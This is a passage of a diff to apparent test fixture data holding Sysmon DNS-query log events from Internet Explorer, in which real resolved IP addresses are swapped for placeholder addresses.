Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029416700Z'/\u003e\u003cEventRecordID\u003e100\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.turn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ad.turn.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", @@ -1735,7 +1735,7 @@ "ProcessId": "2736", "QueryName": "ad.turn.com", "QueryStatus": "0", - "QueryResults": "type: 5 ad.turn.com.akadns.net;::ffff:50.116.194.21;", + "QueryResults": "type: 5 ad.turn.com.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.956", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -1758,7 +1758,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.611619700Z'/\u003e\u003cEventRecordID\u003e101\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.005\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eups.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:34.225.20.218;::ffff:3.216.14.125;::ffff:52.200.28.150;::ffff:3.216.103.132;::ffff:52.4.86.222;::ffff:52.21.200.160;::ffff:3.216.249.238;::ffff:3.94.175.146;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.611619700Z'/\u003e\u003cEventRecordID\u003e101\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.005\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eups.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { 
@@ -1775,7 +1775,7 @@
 "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
 "level": "information",
 "event_data": {
- "QueryResults": "type: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:34.225.20.218;::ffff:3.216.14.125;::ffff:52.200.28.150;::ffff:3.216.103.132;::ffff:52.4.86.222;::ffff:52.21.200.160;::ffff:3.216.249.238;::ffff:3.94.175.146;",
+ "QueryResults": "type: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.005",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -1798,7 +1798,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802369600Z'/\u003e\u003cEventRecordID\u003e102\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epm.w55c.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:34.237.248.89;::ffff:35.153.21.25;::ffff:52.200.238.112;::ffff:52.206.93.38;::ffff:34.227.35.137;::ffff:35.169.96.208;::ffff:52.22.206.42;::ffff:52.201.81.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802369600Z'/\u003e\u003cEventRecordID\u003e102\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epm.w55c.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -1821,7 +1821,7 @@
 "ProcessId": "2736",
 "QueryName": "pm.w55c.net",
 "QueryStatus": "0",
- "QueryResults": "type: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:34.237.248.89;::ffff:35.153.21.25;::ffff:52.200.238.112;::ffff:52.206.93.38;::ffff:34.227.35.137;::ffff:35.169.96.208;::ffff:52.22.206.42;::ffff:52.201.81.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;",
+ "QueryResults": "type: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
 },
 "process": {
@@ -1837,7 +1837,7 @@ { "@timestamp": "2021-05-05T15:30:51.697Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802391800Z'/\u003e\u003cEventRecordID\u003e103\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.093\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.eyereturn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.239.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802391800Z'/\u003e\u003cEventRecordID\u003e103\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.093\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.eyereturn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -1864,7 +1864,7 @@
 "channel": "Microsoft-Windows-Sysmon/Operational",
 "event_data": {
 "QueryStatus": "0",
- "QueryResults": "::ffff:35.186.239.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;",
+ "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.093",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -1899,7 +1899,7 @@
 "event_id": "22",
 "provider_name": "Microsoft-Windows-Sysmon",
 "event_data": {
- "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;",
+ "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.099",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -1915,7 +1915,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802402000Z'/\u003e\u003cEventRecordID\u003e104\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.099\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.googletagservices.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802402000Z'/\u003e\u003cEventRecordID\u003e104\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.099\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.googletagservices.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { 
@@ -1927,7 +1927,7 @@
 "ProcessId": "2736",
 "QueryName": "cm.adgrx.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 rtb.adgrx.com;::ffff:173.231.178.117;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;",
+ "QueryResults": "type: 5 rtb.adgrx.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
 },
 "channel": "Microsoft-Windows-Sysmon/Operational",
@@ -1955,7 +1955,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802413000Z'/\u003e\u003cEventRecordID\u003e105\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adgrx.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 rtb.adgrx.com;::ffff:173.231.178.117;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802413000Z'/\u003e\u003cEventRecordID\u003e105\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adgrx.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 rtb.adgrx.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } 
@@ -1978,7 +1978,7 @@
 },
 "event_data": {
 "QueryStatus": "0",
- "QueryResults": "type: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:104.193.83.156;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;",
+ "QueryResults": "type: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.107",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -1996,7 +1996,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802423900Z'/\u003e\u003cEventRecordID\u003e106\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecsm2waycm-atl.netmng.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:104.193.83.156;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
